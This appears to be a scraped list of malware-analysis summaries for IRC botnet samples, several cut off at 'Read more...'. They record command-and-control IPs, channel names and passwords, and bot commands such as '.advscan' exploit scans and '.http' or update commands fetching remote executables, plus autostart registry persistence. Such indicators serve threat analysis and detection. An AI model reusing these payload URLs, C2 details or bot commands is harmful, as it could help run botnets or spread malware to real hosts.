Remote Host Port Number 174.37.200.82 80 216.178.38.224 80 216.178.39.11 80 64.211.162.88 80 66.220.146.11 80 213.229.99.144 1234 PASS xxx NICK NEW-[USA|00|P|21899] USER XP-0708 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|21899] -ix JOIN #!nn! test PONG 22 MOTD infos about hosting: http://whois.domaintools.com/213.229.99.144

Remote Host Port Number 222.122.46.122 80 91.121.96.162 6667 91.121.96.162 7000 NICK n{USA|XP}671615 NICK {USA|XP}077961 USER 0779 “” “TsGh” :0779 USER 7334 “” “TsGh” :7334 JOIN ##bote## PRIVMSG ##bote## :[Update]: Updating to: http://www.lespel.co.kr/images/USB_Vlad.exe JOIN #Weed PRIVMSG #Weed : New PC Infected. MODE pLagUe{USA}32852 -ix MODE #Weed -ix NICK pLagUe{USA}32852 USER SkuZ * ok TeaM UniX b0atRead more...

aaaa.forexinvest4.com ip: 109.196.130.66 aaaa.forexinvest4.com ip: 109.196.130.50 aaaa.forexinvest4.com:6939 PASS laorosr Channel#dpi Channel#! NICK [N00_USA_XP_39922187] rssr SP2-917 * 0 :COMPUTERNAME Now talking in #! Topic is ‘.asc -S|.http http://walthamfinancial.com/xmob.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0Read more...

dns.aswend.com DNS_TYPE_A 70.107.249.167 70.107.249.167:7000 Nick: FL945610713002 Username: jtwwskrskekm Joined Channel: #GL with Password .x. Channel Topic for Channel #GL: “.advscan asn1smbnt 100 5 0 -b -r -s” Now talking in #GL Topic On: [ #GL ] [ .advscan asn1http 100 5 0 -b -r -s ] Topic By: [ ER ] Modes On: [ #GLRead more...

Remote Host Port Number 212.95.32.241 6667 NICK {XPUSA900275} MODE {XPUSA900275} -ix JOIN ##spam## PONG irc.priv8net.com USER COMPUTERNAME * 0 :COMPUTERNAME NICK {XPUSA60072} Now talking in ##security-check## Topic On: [ ##security-check## ] [ .part ##security-check## ] Topic By: [ Z-3R0 ] infos about hosting: http://whois.domaintools.com/212.95.32.241

Remote Host Port Number 64.202.107.28 6667 NICK SoPro{USA-XP}378825 USER 3788 “” “SoPro” :3788 PONG :7153F3C2 JOIN #oGG wiggernet PRIVMSG #oGG : 9Main 9>>-

Remote Host Port Number 77.30.55.134 3086 Other details * The following port was open in the system: Port Protocol Process 1051 TCP svchost.exe (%AppData%Microsoftsvchost.exe) Registry Modifications * The following Registry Key was created: o HKEY_CURRENT_USERSoftwareeeptfs2 * The newly created Registry Values are: o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + Startup = “%AppData%Microsoftsvchost.exe” so that svchost.exe runs every time WindowsRead more...

Remote Host Port Number 174.37.200.82 80 63.135.80.224 80 63.135.80.46 80 66.220.147.11 80 96.17.164.187 80 64.202.102.10 1234 PASS xxx MODE NEW-[USA|00|P|42884] -ix JOIN #!nn! test PONG 22 MOTD NICK NEW-[USA|00|P|42884] USER XP-9086 * 0 :COMPUTERNAME infos about hosting: http://whois.domaintools.com/64.202.102.10

Remote Host Port Number 174.37.200.82 80 208.50.81.160 80 216.178.39.11 80 63.135.80.224 80 66.220.149.32 80 205.234.144.207 1234 PASS xxx MODE NEW-[USA|00|P|75060] -ix JOIN #!nn! test PONG 22 MOTD NICK NEW-[USA|00|P|75060] USER XP-9002 * 0 :COMPUTERNAME infos about hosting: http://whois.domaintools.com/205.234.144.207

cancanmt2.no-ip.biz: type A, class IN, addr 95.9.90.39 Dest Port:100 Summary Creates temporary files Queries a list of all running processes Performs DNS lookups Enables debug privileges Creates files inside the system directory Loads the internet automation component (ieframe.dll) Creates an autostart registry key Checks for debuggers (Devices) Creates a thread in another existing process (threadRead more...